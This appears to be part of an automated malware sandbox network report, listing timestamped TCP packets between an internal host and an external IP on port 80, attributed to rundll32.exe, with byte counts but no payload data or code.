May 4, 2022 16:20:11.200613976 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200706005 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200721979 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200764894 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200817108 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200819016 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200822115 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200879097 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200917959 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.200932026 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.200936079 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201226950 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201296091 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201297998 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201355934 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201400042 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201404095 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201411963 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201466084 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201498032 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.201523066 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.201528072 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.202259064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.202316046 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.202337027 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.202347994 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.202385902 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203457117 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203504086 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203526020 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203548908 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203563929 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203603029 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203609943 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203668118 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203710079 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203716040 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203725100 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203782082 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203820944 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203825951 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203840971 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203880072 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203915119 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.203938961 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.203994989 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204039097 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204055071 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204062939 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204092979 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204114914 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204133987 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204174042 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204181910 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204185963 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204214096 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204253912 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204257011 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204284906 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204305887 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204309940 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204324961 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204363108 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204379082 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204401016 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204433918 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204442024 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204461098 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204516888 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204530001 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204560995 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204588890 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204603910 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204643011 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.204652071 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204655886 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.204698086 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215446949 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215486050 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215509892 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215533018 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215555906 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215575933 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215596914 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215615034 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215620041 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215639114 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215645075 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215660095 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215684891 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215707064 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215708971 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215717077 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215743065 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215780020 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215780020 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215805054 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215830088 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215847015 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215856075 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215856075 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215878963 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.215881109 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215898037 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.215985060 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.216011047 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.216825008 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.217657089 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.489303112 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.506875992 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781847954 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781888962 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781909943 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781930923 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781953096 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781974077 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.781992912 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.782098055 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.782124043 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.782237053 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.782264948 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.782290936 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.782310963 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.782341003 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.782351017 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.783119917 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796093941 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796130896 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796211004 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796269894 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796287060 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796334028 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796339035 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796350956 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796353102 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796367884 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796384096 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796390057 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796411037 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796433926 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796437979 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796457052 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796473026 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796492100 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796495914 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796509981 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796528101 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796545982 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796565056 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796581984 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796581984 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796586037 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796600103 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796613932 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.796622992 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796673059 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.796677113 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.799129963 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.799161911 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.799179077 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.799192905 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.799205065 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.799233913 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.799609900 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.810745955 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810796022 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810818911 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810841084 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810858965 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810882092 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810904026 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.810921907 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.811026096 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.811053038 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.811063051 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.811077118 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.811085939 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.811101913 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.7 | 49773 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2022 16:20:10.851257086 CEST | 1226 | OUT | |
May 4, 2022 16:20:11.145236969 CEST | 1227 | IN |